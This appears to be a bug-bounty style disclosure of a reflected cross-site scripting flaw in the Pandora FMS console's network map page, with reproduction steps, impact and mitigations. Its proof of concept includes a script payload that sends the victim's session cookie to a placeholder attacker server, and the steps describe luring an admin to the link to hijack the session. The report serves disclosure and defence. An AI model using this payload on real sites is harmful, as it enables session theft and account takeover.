Description

Basic XSS:

XSS (Cross-Site Scripting) vulnerabilities arise when untrusted data gets interpreted as code in a web context. XSS attacks effectively make the attacker logged in as the target user, with the nasty addition of tricking the user into giving some information (such as their password) to the attacker, perhaps downloading and executing malware on the user's workstation.

Steps to reproduce:

1. Get the request by hitting the help button in the "http://localhost:8080/pandora_console/index.php?sec=network&sec2=operation/agentes/pandora_networkmap". (As shown in POC).
2. Add the payload in the "b" parameter in the request.
3. Copy the URL with payload in it, and it to the user logged in as admin.
4. When Admin user try to visit the malicious link payload will gets executed.
5. Session Cookie will be send to the our controlled server.
6. Once we gets the cookie we can log in as Admin using the same.

Proof of Concept

Payload Used:

<script>alert(document.cookie);var i=new Image;i.src="http://attacker_controlled_server/?"+document.cookie;</script>

POC Link:

https://drive.google.com/drive/folders/1DjGrBii9wGWews19vFkesCgLIqlJZivP?usp=sharing

Impact

Attacker can get the any user session cookie using this vulnerability, and can be logged into that users session. If Attacker gets the session of admin user he/she will have all the access of the application, and he/she can even delete the users.

Mitigation:

1. Generate HTML safely using a templating engine, or use a static JavaScript frontend to avoid HTML generation altogether.
2. If you display untrusted HTML content on your website, purify it first and contain it in a sandboxed frame.